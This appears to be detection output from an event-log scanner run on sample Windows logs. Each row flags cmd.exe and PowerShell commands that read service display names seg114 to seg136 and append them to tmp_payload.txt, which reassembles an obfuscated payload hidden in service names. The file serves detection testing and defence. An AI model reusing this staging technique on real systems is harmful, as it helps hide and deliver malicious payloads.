+2021-11-03 17:37:12.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:12.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:14.417 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:14.417 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:15.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:15.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:17.309 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:17.324 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:18.812 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:18.812 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:20.265 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:20.281 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:21.715 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:21.715 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:23.168 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:23.168 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:24.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:24.615 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:26.056 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:26.072 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:27.510 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:27.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:28.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:28.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:30.412 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:30.412 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:31.851 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:31.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:33.302 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:33.318 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:34.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:34.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb38 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:36.225 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:36.225 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:37.694 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:37.694 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfdc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:39.178 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:39.178 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:40.633 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:40.633 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:42.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:42.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:43.595 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:43.610 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:45.043 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
